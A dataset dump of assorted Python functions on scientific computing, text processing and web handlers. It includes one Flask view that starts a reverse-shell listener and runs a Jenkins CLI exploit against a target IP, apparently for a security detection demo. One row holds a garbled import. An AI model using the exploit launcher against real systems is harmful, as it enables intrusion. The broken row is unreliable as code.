content
stringlengths
35
762k
sha1
stringlengths
40
40
id
int64
0
3.66M
def nonsingular_concat(X, vector): """Appends vector to matrix X iff the resulting matrix is nonsingular. Args: X (np.array): NxM Matrix to be appended to vector (np.array): Nx1 vector to be appended to X Returns: new_X (np.array): Nx(M+1) Matrix or None """ # Cast vector to matrix vector = np.atleast_2d(vector) # Append vector as new row at bottom of matrix new_X = np.concatenate((X, vector), axis=0) # Check if matrix is still non-singular if new_X.shape[0] == np.linalg.matrix_rank(new_X): return new_X else: return None
68a1f6f8b0ea5e14fbbcacc618f2d19b07814813
3,652,432
from typing import Union def get_oxidation_state(element: Union[str, Element]) -> int: """Get a typical oxidation state If it doesn't exist in the database, 0 is returned. Args: element (str/ Element): Input element Return: Oxidation state of the element. """ try: return oxidation_state_dict[str(element)] except KeyError: logger.warning(f"Oxidation state: {element} is unavailable. Set 0.") return 0
24187bd8eb5c6d5794f1e287c676b0f16c170d55
3,652,433
from typing import Callable def __quality_indexes( graph: nx.Graph, communities: object, scoring_function: Callable[[object, object], float], summary: bool = True, ) -> object: """ :param graph: NetworkX/igraph graph :param communities: NodeClustering object :param summary: boolean. If **True** it is returned an aggregated score for the partition is returned, otherwise individual-communitys ones. Default **True**. :return: If **summary==True** a FitnessResult object, otherwise a list of floats. """ graph = convert_graph_formats(graph, nx.Graph) values = [] for com in communities.communities: community = nx.subgraph(graph, com) values.append(scoring_function(graph, community)) if summary: return FitnessResult( min=min(values), max=max(values), score=np.mean(values), std=np.std(values) ) return values
a328ec08bef43248c6e8fd7a0f11901801b0e2a5
3,652,434
def readFromDB_DSC_authorityKey(authorityKey: bytes, connection: Connection) -> DocumentSignerCertificate: """Reading from database""" try: logger.info("Reading DSC object from database with authority key.") return connection.getSession().query(DocumentSignerCertificateStorage).filter(DocumentSignerCertificateStorage.authorityKey == authorityKey).all() except Exception: raise DocumentSignerCertificateStorageError("Problem with writing the object")
34cff097201af92d337568094b8d48577f7e440f
3,652,436
def history_report(history, config=None, html=True): """ Test a model and save a history report. Parameters ---------- history : memote.HistoryManager The manager grants access to previous results. config : dict, optional The final test report configuration. html : bool, optional Whether to render the report as full HTML or JSON (default True). """ if config is None: config = ReportConfiguration.load() report = HistoryReport(history=history, configuration=config) if html: return report.render_html() else: return report.render_json()
8ba956c959b72f37b570b91ea4f01287eb8783c6
3,652,437
def derive_from_dem(dem): """derive slope and flow direction from a DEM. Results are returned in a dictionary that contains references to ArcPy Raster objects stored in the "in_memory" (temporary) workspace """ # set the snap raster for subsequent operations env.snapRaster = dem # calculate flow direction for the whole DEM flowdir = FlowDirection(in_surface_raster=dem, force_flow="NORMAL") flow_direction_raster = so("flowdir","random","in_memory") flowdir.save(flow_direction_raster) # calculate slope for the whole DEM slope = Slope(in_raster=dem, output_measurement="PERCENT_RISE", method="PLANAR") slope_raster = so("slope","random","in_memory") slope.save(slope_raster) return { "flow_direction_raster": Raster(flow_direction_raster), "slope_raster": Raster(slope_raster), }
4563e4ccd6695865c05c7a945dcc6244fb8af012
3,652,438
from typing import Optional def from_error_details(error: str, message: str, stacktrace: Optional[str]) -> BidiException: """Create specific WebDriver BiDi exception class from error details. Defaults to ``UnknownErrorException`` if `error` is unknown. """ cls = get(error) return cls(error, message, stacktrace)
238566bcf1092b685deebcadcf60c1905e585cb9
3,652,439
def tangential_proj(u, n): """ See for instance: https://link.springer.com/content/pdf/10.1023/A:1022235512626.pdf """ return (ufl.Identity(u.ufl_shape[0]) - ufl.outer(n, n)) * u
92c8eafa222418221b2fb0e1b242dbd76696407d
3,652,440
def _RemoveEdges(tris, match): """tris is list of triangles. er is as returned from _MaxMatch or _GreedyMatch. Return list of (A,D,B,C) resulting from deleting edge (A,B) causing a merge of two triangles; append to that list the remaining unmatched triangles.""" ans = [] triset = set(tris) while len(match) > 0: (_, e, tl, tr) = match.pop() (a, b) = e if tl in triset: triset.remove(tl) if tr in triset: triset.remove(tr) c = _OtherVert(tl, a, b) d = _OtherVert(tr, a, b) if c is None or d is None: continue ans.append((a, d, b, c)) return ans + list(triset)
d2415f7275652254ca87a7621e483a29816a8083
3,652,441
def get_course_authoring_url(course_locator): """ Gets course authoring microfrontend URL """ return configuration_helpers.get_value_for_org( course_locator.org, 'COURSE_AUTHORING_MICROFRONTEND_URL', settings.COURSE_AUTHORING_MICROFRONTEND_URL )
cea917ca211be1fdd1b4cf028652101392fd80ab
3,652,442
def sumDwellStateSub(params): """Threaded, sums dwell times with 1 day seeing no change & accounting for fractional days""" (dfIn,dwellTime,weight) = params dfOut = dfIn.copy(deep=True) while dwellTime > 1: if dwellTime > 2: increment = 1 else: increment = dwellTime-1 dfOut += dfShift(dfIn,1) * increment dwellTime += -1 return dfOut * weight
47ab530bfad9a321bf349e7542f279aae0958a9b
3,652,443
def launch_attacker_view(): """ Accepts a JSON payload with the following structure: { "target": "nlb-something.fqdn.com", "attacker": "1.2.3.4" } If the payload parses correctly, then launch a reverse shell listener using pexpect.spawn then spawn the auto-sploit.sh tool and enter the target and attacker info again using pexpect :return: Simple String response for now """ managed_instances = get_managed_instances() if request.method == 'GET': return render_template('routing/attacker_view.html', log_group=log_group, attacker_ip=attacker_ip, managed_instances=managed_instances, gd_events_of_interest=gd_events_of_interest, target_ip=target_ip) if request.method == 'POST': logger.info('Attacker is {} and Victim is {}'.format(attacker_ip, target_ip)) print('Attacker is {} and Victim is {}'.format(attacker_ip, target_ip)) if target_ip == "" or attacker_ip == "": logger.info('Incorrect Json format!') print(request.payload) res = make_response(jsonify( { "result": "error", "message": "ERROR - Incorrect Json format" }), 200) res.headers['Content-type'] = 'application/json' return res # Run auto_sploit.sh _launch_listener() logger.info('launching listener process') # # Create the payload from the attacker source ip input create_payload() # Run the exploit jenkins_cli_url = 'http://' + target_ip + ':80/cli' # # Get an initial session id with download session = exploit_get_sessionid(jenkins_cli_url) # if session: # Try and upload payload if upload_chunked(jenkins_cli_url, session, "asdf"): logger.info('Exploit_launched_ok') res = make_response(jsonify( { "result": "success", "message": "SUCCESS - auto-sploit launched!" }), 200) res.headers['Content-type'] = 'application/json' return res else: logger.info('Failed to launch exploit') res = make_response(jsonify( { "result": "error", "message": "ERROR - Unable to run exploit" }), 200) res.headers['Content-type'] = 'application/json' return res
2c987a2b552fa5cfc6e85240c71d496fe43785c3
3,652,444
import copy def stretch(alignment, factor): """Time-stretch the alignment by a constant factor""" # Get phoneme durations durations = [factor * p.duration() for p in alignment.phonemes()] alignment = copy.deepcopy(alignment) alignment.update(durations=durations) return alignment
1ea58c32509365d503379df616edd00718cfca19
3,652,445
def _read_node( data, pos, md_total ): """ 2 3 0 3 10 11 12 1 1 0 1 99 2 1 1 2 The quantity of child nodes. The quantity of metadata entries. Zero or more child nodes (as specified in the header). """ child_count = data[ pos ] pos += 1 md_count = data[ pos ] pos += 1 for i in range( child_count ): pos, md_total = _read_node( data, pos, md_total ) for m in range( md_count ): md_total += data[ pos ] pos += 1 return ( pos, md_total )
768036031ab75b532d667769477f8d3144129ac8
3,652,450
def _large_flag_fit(x, yDat, yFit, initz, speciesDict, minSize, errBound): """ Attempts to more robustly fit saturated lyman alpha regions that have not converged to satisfactory fits using the standard tools. Uses a preselected sample of a wide range of initial parameter guesses designed to fit saturated lines (see get_test_lines). **Parameters** :x: (N) ndarray array of wavelength :ydat: (N) ndarray array of desired flux profile to be fitted for the wavelength space given by x. Same size as x. :yFit: (N) ndarray array of flux profile fitted for the wavelength space given by x already. Same size as x. :initz: float redshift to try putting first line at (maximum absorption for region) :speciesDict: dictionary dictionary containing all relevant parameters needed to create an absorption line of a given species (f,Gamma,lambda0) as well as max and min values for parameters to be fit :minsize: float minimum absorption allowed for a line to still count as a line given in normalized flux (ie: for minSize=.9, only lines with minimum flux less than .9 will be fitted) :errbound: float maximum total error allowed for an acceptable fit **Returns** :bestP: (3,) ndarray array of best parameters if a good enough fit is found in the form [[N1,b1,z1], [N2,b2,z2],...] """ #Set up some initial line guesses lineTests = _get_test_lines(initz) #Keep track of the lowest achieved error bestError = 1000 #Iterate through test line guesses for initLines in lineTests: if initLines[1,0]==0: initLines = np.delete(initLines,1,axis=0) #Do fitting with initLines as first guess linesP,flag=_complex_fit(x,yDat,yFit,initz, minSize,errBound,speciesDict,initP=initLines) #Find error of last fit yNewFit=_gen_flux_lines(x,linesP,speciesDict) dif = yFit*yNewFit-yDat errSq=sum(dif**2) #If error lower, keep track of the lines used to make that fit if errSq < bestError: bestError = errSq bestP = linesP if bestError>10*errBound*len(x): return [] else: return bestP
c065e9e1500977dfa1a522ebd238d2e71e188c6a
3,652,451
from typing import Type def mse_large_arrays_masked(dataA: 'LargeArray', dataB: 'LargeArray', mask: 'LargeArray', dtype: Type, batchSizeFlat=1e8): """ Compute MSE between two HDF datasets, considering elements where the mask is set to true (one). Computation is performed in batches to decrease memory requirements. """ if dataA.shape != dataB.shape or dataA.shape != mask.shape: raise ValueError("Arguments should have equal shapes, {}, {} and {} given." .format(dataA.shape, dataB.shape, mask.shape)) sum = 0.0 count = 0 for batchStart, batchEnd in get_batch_indices(dataA.shape, dtype, batchSizeFlat): batchMask = mask[batchStart:batchEnd] diff = batchMask * (dataA[batchStart:batchEnd].astype(dtype) - dataB[batchStart:batchEnd].astype(dtype)) square = np.square(diff) nonzeroNumber = np.count_nonzero(batchMask) sum += np.sum(square) count += nonzeroNumber return sum / count if count > 0 else float('nan')
27636fc32d208d544b0b2f9790015e6f3d86a69d
3,652,452
import copy def xml_elem_or_str_to_text(elem_or_xmlstr, default_return=""): """ Return string with all tags stripped out from either etree element or xml marked up string If string is empty or None, return the default_return >>> root = etree.fromstring(test_xml) >>> xml_elem_or_str_to_text(test_xml, None)[0:100] 'this is just authoring test stuff\\n whatever is in the abstract\\n \\n ' >>> xml_elem_or_str_to_text(root, None)[0:100] 'this is just authoring test stuff\\n whatever is in the abstract\\n \\n ' >>> root = etree.fromstring("<myxml>this <b>is <i>really</i><empty/></b> xml.</myxml>", None) #mixed content element >>> xml_elem_or_str_to_text(root, None) 'this is really xml.' >>> isinstance(xml_elem_or_str_to_text(root, None), str) # make sure it's string True >>> xml_elem_or_str_to_text(xml_xpath_return_textsingleton(root, "pxxx", ""), None) """ ret_val = default_return if elem_or_xmlstr is None or elem_or_xmlstr == "": ret_val = default_return elif isinstance(elem_or_xmlstr, lxml.etree._ElementUnicodeResult): ret_val = "%s" % elem_or_xmlstr # convert to string # just in case the caller sent a string. else: try: if isinstance(elem_or_xmlstr, str): parser = lxml.etree.XMLParser(encoding='utf-8', recover=True) elem = etree.fromstring(elem_or_xmlstr.encode("utf8"), parser) else: elem = copy.copy(elem_or_xmlstr) # etree will otherwise change calling parm elem_or_xmlstr when stripping except Exception as err: logger.error(err) ret_val = default_return try: etree.strip_tags(elem, '*') inner_text = elem.text if inner_text: ret_val = inner_text.strip() else: ret_val = default_return except Exception as err: logger.error("xmlElemOrStrToText: ", err) ret_val = default_return if ret_val == "": ret_val = default_return return ret_val
1e13c74d3d7d69fdd1ce8011384e1ee564f366f1
3,652,453
def sequence_equals(sequence1, sequence2): """ Inspired by django's self.assertSequenceEquals Useful for comparing lists with querysets and similar situations where simple == fails because of different type. """ assert len(sequence1) == len(sequence2), (len(sequence1), len(sequence2)) for item_from_s1, item_from_s2 in zip(sequence1, sequence2): assert item_from_s1 == item_from_s2, (item_from_s1, item_from_s2) return True
38016a347caf79458bb2a872d0fd80d6b813ba33
3,652,454
def statistical_features(ds, exclude_col_names: list = [], feature_names=['mean', 'median', 'stddev', 'variance', 'max', 'min', 'skew', 'kurt', 'sqr']): """ Compute statistical features. Args: ds (DataStream): Windowed/grouped DataStream object exclude_col_names list(str): name of the columns on which features should not be computed feature_names list(str): names of the features. Supported features are ['mean', 'median', 'stddev', 'variance', 'max', 'min', 'skew', 'kurt', 'sqr', 'zero_cross_rate' Returns: DataStream object with all the existing data columns and FFT features """ exclude_col_names.extend(["timestamp", "localtime", "user", "version"]) data = ds._data._df.drop(*exclude_col_names) df_column_names = data.columns basic_schema = StructType([ StructField("timestamp", TimestampType()), StructField("localtime", TimestampType()), StructField("user", StringType()), StructField("version", IntegerType()), StructField("start_time", TimestampType()), StructField("end_time", TimestampType()) ]) features_list = [] for cn in df_column_names: for sf in feature_names: features_list.append(StructField(cn + "_" + sf, FloatType(), True)) features_schema = StructType(basic_schema.fields + features_list) def calculate_zero_cross_rate(series): """ How often the signal changes sign (+/-) """ series_mean = np.mean(series) series = [v - series_mean for v in series] zero_cross_count = (np.diff(np.sign(series)) != 0).sum() return zero_cross_count / len(series) def get_sqr(series): sqr = np.mean([v * v for v in series]) return sqr @pandas_udf(features_schema, PandasUDFType.GROUPED_MAP) def get_stats_features_udf(df): results = [] timestamp = df['timestamp'].iloc[0] localtime = df['localtime'].iloc[0] user = df['user'].iloc[0] version = df['version'].iloc[0] start_time = timestamp end_time = df['timestamp'].iloc[-1] df.drop(exclude_col_names, axis=1, inplace=True) if "mean" in feature_names: df_mean = df.mean() df_mean.index += '_mean' results.append(df_mean) if "median" in feature_names: df_median = df.median() df_median.index += '_median' results.append(df_median) if "stddev" in feature_names: df_stddev = df.std() df_stddev.index += '_stddev' results.append(df_stddev) if "variance" in feature_names: df_var = df.var() df_var.index += '_variance' results.append(df_var) if "max" in feature_names: df_max = df.max() df_max.index += '_max' results.append(df_max) if "min" in feature_names: df_min = df.min() df_min.index += '_min' results.append(df_min) if "skew" in feature_names: df_skew = df.skew() df_skew.index += '_skew' results.append(df_skew) if "kurt" in feature_names: df_kurt = df.kurt() df_kurt.index += '_kurt' results.append(df_kurt) if "sqr" in feature_names: df_sqr = df.apply(get_sqr) df_sqr.index += '_sqr' results.append(df_sqr) output = pd.DataFrame(pd.concat(results)).T basic_df = pd.DataFrame([[timestamp, localtime, user, int(version), start_time, end_time]], columns=['timestamp', 'localtime', 'user', 'version', 'start_time', 'end_time']) return basic_df.assign(**output) # check if datastream object contains grouped type of DataFrame if not isinstance(ds._data, GroupedData): raise Exception( "DataStream object is not grouped data type. Please use 'window' operation on datastream object before running this algorithm") data = ds._data.apply(get_stats_features_udf) return DataStream(data=data, metadata=Metadata())
544b32b3f909c8f98ae18ae43006719105627a85
3,652,455
def second_order_difference(t, y): """ Calculate the second order difference. Args: t: ndarray, the list of the three independent variables y: ndarray, three values of the function at every t Returns: double: the second order difference of given points """ # claculate the first order difference first_order_difference = (y[1:] - y[:-1]) / (t[1:] - t[:-1]) return (first_order_difference[1] - first_order_difference[0]) / (t[2] - t[0])
40e37d2b34104772966afc34e41c1ebc742c9adf
3,652,456
def timeDelay( gpsTime, rightAscension, declination, unit, det1, det2 ): """ timeDelay( gpsTime, rightAscension, declination, unit, det1, det2 ) Calculates the time delay in seconds between the detectors 'det1' and 'det2' (e.g. 'H1') for a sky location at (rightAscension and declination) which must be given in certain units ('radians' or 'degree'). The time is passes as GPS time. A positive time delay means the GW arrives first at 'det2', then at 'det1'. Example: antenna.timeDelay( 877320548.000, 355.084,31.757, 'degree','H1','L1') 0.0011604683260994519 Given these values, the signal arrives first at detector L1, and 1.16 ms later at H2 """ # check the input arguments if unit =='radians': ra_rad = rightAscension de_rad = declination elif unit =='degree': ra_rad = rightAscension/180.0*pi de_rad = declination/180.0*pi else: raise ValueError("Unknown unit %s" % unit) # check input values if ra_rad<0.0 or ra_rad> 2*pi: raise ValueError( "ERROR. right ascension=%f "\ "not within reasonable range."\ % (rightAscension)) if de_rad<-pi or de_rad> pi: raise ValueError( "ERROR. declination=%f not within reasonable range."\ % (declination)) if det1 == det2: return 0.0 gps = lal.LIGOTimeGPS( gpsTime ) x1 = lalsimulation.DetectorPrefixToLALDetector(det1).location x2 = lalsimulation.DetectorPrefixToLALDetector(det2).location timedelay = lal.ArrivalTimeDiff(list(x1), list(x2), ra_rad, de_rad, gps) return timedelay
eb0f444ad2a2be0cf10d62fdbe8b41c8d924c798
3,652,457
def RngBinStr(n): """ Takes a int which represents the length of the final binary number. Returns a string which represents a number in binary where each char was randomly generated and has lenght n. """ num = "" for i in range(n): if rng.random() < 0.5: num += "0" else: num += "1" return num
cf063532425b51243f3ba95f90df892bda121363
3,652,458
def get_bdbox_from_heatmap(heatmap, threshold=0.2, smooth_radius=20): """ Function to extract bounding boxes of objects in heatmap Input : Heatmap : matrix extracted with GradCAM. threshold : value defining the values we consider , increasing it increases the size of bounding boxes. smooth_radius : radius on which each pixel is blurred. Output : returned_objects : List of bounding boxes, N_objects * [ xmin, xmax, ymin, ymax, width, height ] """ # If heatmap is all zeros i initialize a default bounding box which wraps entire image xmin = 0 xmax = heatmap.shape[1] ymin = 0 ymax = heatmap.shape[0] width = xmax-xmin height = ymax-ymin returned_objects = [] # Count if there is any "hot" value on the heatmap count = (heatmap > threshold).sum() # Blur the image to have continuous regions heatmap = ndimage.uniform_filter(heatmap, smooth_radius) # Threshold the heatmap with 1 for values > threshold and 0 else thresholded = np.where(heatmap > threshold, 1, 0) # Apply morphological filter to fill potential holes in the heatmap thresholded = ndimage.morphology.binary_fill_holes(thresholded) # Detect all independant objects in the image labeled_image, num_features = ndimage.label(thresholded) objects = ndimage.measurements.find_objects(labeled_image) # We loop in each object ( if any is detected ) and append it to a global list if count > 0: for obj in objects: x = obj[1] y = obj[0] xmin = x.start xmax = x.stop ymin = y.start ymax = y.stop width = xmax-xmin height = ymax-ymin returned_objects.append([xmin, xmax, ymin, ymax, width, height]) else: returned_objects.append([xmin, xmax, ymin, ymax, width, height]) return returned_objects
0a7397263cf2b8b238679f3cd54b8bcb67553387
3,652,459
def get_request(request_id, to_json=False, session=None): """ Get a request or raise a NoObject exception. :param request_id: The id of the request. :param to_json: return json format. :param session: The database session in use. :raises NoObject: If no request is founded. :returns: Request. """ try: query = session.query(models.Request).with_hint(models.Request, "INDEX(REQUESTS REQUESTS_SCOPE_NAME_IDX)", 'oracle')\ .filter(models.Request.request_id == request_id) ret = query.first() if not ret: return None else: if to_json: return ret.to_dict_json() else: return ret.to_dict() except sqlalchemy.orm.exc.NoResultFound as error: raise exceptions.NoObject('request request_id: %s cannot be found: %s' % (request_id, error))
41d34057b859a88818866a03392ec6f96d2b4983
3,652,460
def gen_multi_correlated(N, n, c_mat, p_arr, use_zscc=False, verify=False, test_sat=False, pack_output=True, print_stat=False): """Generate a set of bitstreams that are correlated according to the supplied correlation matrix""" #Test if the desired parameters are satisfiable sat_result = corr_sat(N, n, c_mat, p_arr, for_gen=True, print_stat=print_stat, use_zscc=use_zscc) if not sat_result: if print_stat: print("SCC MATRIX NOT SATISFIABLE") return test_sat #Don't fail the test if we were intending to check correlation satisfiability sat = sat_result[0] if not test_sat and not sat: if print_stat: print("SCC MATRIX NOT SATISFIABLE") return False Dij = sat_result[1] N_arr = sat_result[2] if print_stat: print(c_mat) print(p_arr) #Perform the generation bs_arr = np.zeros((n,N), dtype=np.uint8) def gmc_rec(i): """Recursive portion of gen_multi_correlated""" nonlocal N, n, N_arr, Dij, bs_arr if i == n-1: sentinel = 's' last_cand = next(next_cand(N, N_arr[i], Dij, bs_arr, i), sentinel) if last_cand is not sentinel: bs_arr[i, :] = last_cand return True else: return False else: for cand in next_cand(N, N_arr[i], Dij, bs_arr, i): bs_arr[i, :] = cand if gmc_rec(i+1): return True return False gmc_result = gmc_rec(0) if not test_sat and not gmc_result: if print_stat: print("GEN_MULTI_CORRELATED FAILED: Couldn't find a valid solution") return False if test_sat: if gmc_result != sat: print("Generation result: '{}' did not match scc sat result: '{}'. Corr mat: \n{}. p arr: {}" \ .format(gmc_result, sat, c_mat, p_arr)) return False else: print("SCC SAT TEST PASS. Corr mat: \n{}. p arr: {}".format(c_mat, p_arr)) #Verify the generation if print_stat: print(bs_arr) if verify and gmc_result: cmat_actual = bs.get_corr_mat(bs_arr, bs_len=N, use_zscc=use_zscc) if np.any(np.abs(cmat_actual - c_mat) > 1e-3): if print_stat: print("GEN_MULTI_CORRELATED FAILED: Resulting SCC Matrix doesn't match: \n {} \n should be \n {}" .format(cmat_actual, c_mat)) return False for idx, bs_i in enumerate(bs_arr): p_actual = bs.bs_mean(np.packbits(bs_i), bs_len=N) if np.any(np.abs(p_actual - p_arr[idx]) > 1e-3): if print_stat: print("GEN_MULTI_CORRELATED FAILED: Resulting probability is incorrect: {} (should be {})".format(p_actual, p_arr[idx])) return False if print_stat: print("GEN_MULTI_CORRELATED PASS") if pack_output: return True, np.packbits(bs_arr, axis=1) else: return True, bs_arr
0b1cf206e92363910877b0202b9fb94d377358a3
3,652,461
def rxzero_traj_eval_grad(parms, t_idx): """ Analytical gradient for evaluated trajectory with respect to the log-normal parameters It is expected to boost the optimization performance when the parameters are high-dimensional... """ v_amp_array = np.array([rxzero_vel_amp_eval(parm, t_idx) for parm in parms]) phi_array = np.array([rxzero_normal_Phi_eval(parm, t_idx) for parm in parms]) v_amp_grad_array = np.array([np.vstack([rxzero_vel_amp_eval_grad(parm[0:4], t_idx).T, np.zeros((2, len(t_idx)))]).T for parm in parms]) phi_grad_array = np.array([rxzero_normal_Phi_eval_grad(parm, t_idx) for parm in parms]) v_x_grad = np.concatenate([(v_amp_grad_array[parm_idx].T * np.cos(phi_array[parm_idx]) - v_amp_array[parm_idx] * np.sin(phi_array[parm_idx]) * phi_grad_array[parm_idx].T).T for parm_idx in range(len(parms))], axis=1) v_y_grad = np.concatenate([(v_amp_grad_array[parm_idx].T * np.sin(phi_array[parm_idx]) + v_amp_array[parm_idx] * np.cos(phi_array[parm_idx]) * phi_grad_array[parm_idx].T).T for parm_idx in range(len(parms))], axis=1) dt = t_idx[1] - t_idx[0] pos_x_grad = np.cumsum(v_x_grad, axis=0) * dt pos_y_grad = np.cumsum(v_y_grad, axis=0) * dt return np.array([pos_x_grad, pos_y_grad]), np.array([v_x_grad, v_y_grad])
47aa04aa2096f472dd0f5612c95903fd638cb1d0
3,652,462
import traceback def exec_geoprocessing_model(): """算法模型试运行测试 根据算法模型的guid标识,算法模型的输入参数,运行算法模型 --- tags: - system_manage_api/geoprocessing_model parameters: - in: string name: guid type: string required: true description: 流程模型的guid - in: array name: param type: array required: true description: 算法模型的初始化参数 responses: 200: description: 算法模型运行的结果,结果数组 schema: properties: geoprocessing_model_result: type: object description: 结果数组,[{"function_name":"","value":""},{},...] 500: description: 服务运行错误,异常信息 schema: properties: errMessage: type: string description: 异常信息,包括异常信息的类型 traceMessage: type: string description: 异常更加详细的信息,包括异常的位置 """ try: # exe_functinons_param = {} # exe_functinons_already = {} # exe_functinons_result = {} # param_dic = {x["guid"]: x["default_value"] for x in list(request.json.get('param', []))} # #根据算法模型的guid,从数据库中获取所有的函数信息 # #包括模块、名函数名、参数名称等 # pg_helper = PgHelper() # records = pg_helper.query_datatable( # '''select module_name,function_name,parameter_name,guid, # from_module_name,from_function_name,from_name # from gy_geoprocessing_model_node # where geoprocessing_model_guid=%s''', (request.json.get('guid', None),)) # for x in records: # if not (x["module_name"], x["function_name"]) in exe_functinons_param: # exe_functinons_param[(x["module_name"], x["function_name"])] = {} # exe_functinons_already[(x["module_name"], x["function_name"])] = False # if x["guid"] in param_dic: # exe_functinons_param[(x["module_name"], x["function_name"])][x["parameter_name"]] = param_dic[x["guid"]] # else: # exe_functinons_param[(x["module_name"], x["function_name"])][x["parameter_name"]] = None # exe_functinons_result[(x["from_module_name"], x["from_function_name"], x["from_name"])] = (x["module_name"], x["function_name"], # x["parameter_name"]) # flag_loop = True # latest_result = {} # while flag_loop: # flag_loop = False # #循环每一个函数 # for key_f in exe_functinons_param: # #函数已经运行过 # if exe_functinons_already[key_f]: # continue # #如果一个函数的所有参数值都不是None,在运行所有的函数 # func_exeable = True # for key_p in exe_functinons_param[key_f]: # if exe_functinons_param[key_f][key_p] is None: # func_exeable = False # flag_loop = True # break # #运行函数 # if func_exeable: # latest_result = {} # exe_functinons_already[key_f] = True # temp_result = geoprocessing_algorithm.__dict__[key_f[0]].__dict__[key_f[1]](**exe_functinons_param[key_f]) # #将结果赋给相应的参数 # for key_re in temp_result: # if key_f + (key_re,) in exe_functinons_result: # exe_functinons_param[exe_functinons_result[key_f + # (key_re,)][:-1]][exe_functinons_result[key_f + # (key_re,)][-1]] = temp_result[key_re] # latest_result[key_f] = temp_result # #将最新一次的运行结果进行解析,返回前段 # ret_string = "" # for key_f in latest_result: # for x in geoprocessing_algorithm.__dict__[key_f[0]].__dict__[key_f[1]].__annotations__["return"]: # if x["name_en"] in latest_result[key_f]: # ret_string = ret_string + x["name_zh_cn"] + ":" + str(latest_result[key_f][x["name_en"]]) + "\n" # return jsonify({"geoprocessing_model_result": ret_string}), 200 return jsonify({}), 200 except Exception as exception: return jsonify({"errMessage": repr(exception), "traceMessage": traceback.format_exc()}), 500
8cfcc56117747c78d8b2c4fc10dc29fa8115aa67
3,652,463
import requests def perform_extra_url_query(url): """Performs a request to the URL supplied Arguments: url {string} -- A URL directing to another page of results from the NASA API Returns: Response object -- The response received from the NASA API """ response = requests.request("GET", url) check_query_was_successful(response) return response
7d5fe2d6467d90e1f7e85d2fc51187a36f62305d
3,652,464
from org.optaplanner.optapy import PythonWrapperGenerator # noqa from org.optaplanner.core.api.domain.solution import \ def problem_fact_property(fact_type: Type) -> Callable[[Callable[[], List]], Callable[[], List]]: """Specifies that a property on a @planning_solution class is a problem fact. A problem fact must not change during solving (except through a ProblemFactChange event). The constraints in a ConstraintProvider rely on problem facts for ConstraintFactory.from(Class). Do not annotate planning entities as problem facts: they are automatically available as facts for ConstraintFactory.from(Class). """ def problem_fact_property_function_mapper(getter_function: Callable[[], Any]): ensure_init() ProblemFactProperty as JavaProblemFactProperty getter_function.__optapy_return = get_class(fact_type) getter_function.__optaplannerPlanningEntityCollectionProperty = { 'annotationType': JavaProblemFactProperty } return getter_function return problem_fact_property_function_mapper
068cdbc1a8dab95b5a742740195b4fdaf595de2a
3,652,465
def _load_method_arguments(name, argtypes, args): """Preload argument values to avoid freeing any intermediate data.""" if not argtypes: return args if len(args) != len(argtypes): raise ValueError(f"{name}: Arguments length does not match argtypes length") return [ arg if hasattr(argtype, "_type_") else argtype.from_param(arg) for (arg, argtype) in zip(args, argtypes) ]
0eb6a16c2e4c1cd46a114923f81e93af331c3d6e
3,652,466
import json def crash_document_add(key=None): """ POST: api/vX/crash/<application_key> add a crash document by web service """ if 'Content-Type' not in request.headers or request.headers['Content-Type'].find('multipart/form-data') < 0: return jsonify({ 'success': False, 'message': 'input error' }) reports = request.files.getlist('reports') if reports: ds = DocumentService() for report in reports: documents = json.loads(report.read()) if not isinstance(documents, list): documents = [documents] for document in documents: result, msg = ds.add_document(key, document, DocumentModel.crash) if not result: # error return abort(417, {'message': msg}) # success return jsonify({'success': True, 'message': None}) # no reports return abort(400, {'message': 'input error'})
669c30141d5fb50128b3c60577433938daec5a2a
3,652,467
def log_data(model, action, before, after, instance): """Logs mutation signals for Favourite and Category models Args: model(str): the target class of the audit-log: favourite or category action(str): the type of mutation to be logged: create, update, delete before(dict): the previous value of the data mutated after(dict): the new value of the data mutated instance(object): the favourite or category instance being mutated Returns: object: instance of AuditLog created for the mutation """ log = { 'model': model, 'action': action, 'date': timezone.now(), 'before': before, 'after': after, 'resource_id': instance.id } return AuditLog.objects.create(**log)
f23ef8d2a759130ac55d3dc55f4497099776414f
3,652,468
import requests def download(url, local_filename, chunk_size=1024 * 10): """Download `url` into `local_filename'. :param url: The URL to download from. :type url: str :param local_filename: The local filename to save into. :type local_filename: str :param chunk_size: The size to download chunks in bytes (10Kb by default). :type chunk_size: int :rtype: str :returns: The path saved to. """ response = requests.get(url) with open(local_filename, 'wb') as fp: for chunk in response.iter_content(chunk_size=chunk_size): if chunk: fp.write(chunk) return fp.name
0a86b8600e72e349a4e1344d2ce1ad2bb00b889d
3,652,469
def tokenize(data, tok="space", lang="en"): """Tokenize text data. There are 5 tokenizers supported: - "space": split along whitespaces - "char": split in characters - "13a": Official WMT tokenization - "zh": Chinese tokenization (See ``sacrebleu`` doc) - "moses": Moses tokenizer (you can specify lthe language). Uses the `sacremoses <https://github.com/alvations/sacremoses>`_ Args: data (list, str): String or list (of lists...) of strings. tok (str, optional): Tokenization. Defaults to "space". lang (str, optional): Language (only useful for the moses tokenizer). Defaults to "en". Returns: list, str: Tokenized data """ if tok is "space": def tokenizer(x): return x.split() elif tok is "char": def tokenizer(x): return list(x) elif tok is "13a": def tokenizer(x): return sacrebleu.tokenize_13a(x).split(" ") elif tok is "zh": def tokenizer(x): return sacrebleu.tokenize_zh(x).split(" ") elif tok is "moses": moses_tok = sacremoses.MosesTokenizer(lang=lang) def tokenizer(x): return moses_tok.tokenize(x) else: raise ValueError(f"Unknown tokenizer {tok}") return _tokenize(data, tokenizer)
0974edc3a4d66b90add101002fbcc1486c21e5ce
3,652,471
def ift2(x, dim=(-2, -1)): """ Process the inverse 2D fast fourier transform and swaps the axis to get correct results using ftAxis Parameters ---------- x: (ndarray) the array on which the FFT should be done dim: the axis (or a tuple of axes) over which is done the FFT (default is the last of the array) Returns ------- See Also -------- ftAxis, ftAxis_time, ift, ft2, ift2 """ assert isinstance(x, np.ndarray) if hasattr(dim, '__iter__'): for d in dim: if not isinstance(d, int): raise TypeError( 'elements in dim should be an integer specifying the array dimension over which to do the calculation') assert d <= len(x.shape) else: if not isinstance(dim, int): raise TypeError( 'elements in dim should be an integer specifying the array dimension over which to do the calculation') assert dim <= len(x.shape) out = np.fft.fftshift(np.fft.ifft2(np.fft.fftshift(x, axes=dim)), axes=dim) return out
50377bb81fa17c152f8b8053cdae1502dbc791ad
3,652,472
